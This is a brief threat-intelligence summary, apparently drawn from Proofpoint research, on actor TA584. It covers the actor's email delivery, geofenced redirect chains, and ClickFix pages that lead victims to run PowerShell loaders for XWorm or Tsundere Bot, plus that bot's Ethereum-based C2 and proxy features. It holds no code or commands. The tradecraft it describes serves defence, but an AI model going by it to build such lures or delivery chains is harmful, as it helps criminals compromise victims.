Initial access broker TA584 has escalated operations, using hundreds of compromised aged accounts sent through SendGrid and Amazon SES to deliver geofenced redirect chains that funnel victims through CAPTCHA and ClickFix pages to run PowerShell loaders that deploy Tsundere Bot or XWorm in memory. Tsundere Bot, a Node.js-based malware-as-a-service that retrieves C2 via the Ethereum blockchain, communicates over WebSockets, checks system locale to avoid CIS languages, and supports data collection, lateral movement, SOCKS proxying and a built-in bot marketplace, is assessed to likely enable ransomware follow-on activity. #TA584 #TsundereBot
Keypoints
- TA584 significantly increased activity in late 2025 and expanded targeting beyond North America and the UK to Germany, other European countries, and Australia.
- The attack chain uses compromised aged accounts, SendGrid/Amazon SES delivery, unique URLs, geofencing, IP filtering, and TDS redirect chains such as Keitaro.
- Targets who pass filters are shown a CAPTCHA and ClickFix page that instructs them to run a PowerShell command, which fetches an obfuscated script that loads XWorm or Tsundere Bot in memory.
- Tsundere Bot is a MaaS that requires Node.js, retrieves C2 addresses from the Ethereum blockchain (with a hardcoded fallback), executes JavaScript from C2, and can turn hosts into SOCKS proxies.
- Proofpoint has observed TA584 deploy many payloads (e.g., Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, DCRAT) and expects the actor to continue experimenting and expanding targets, increasing ransomware risk.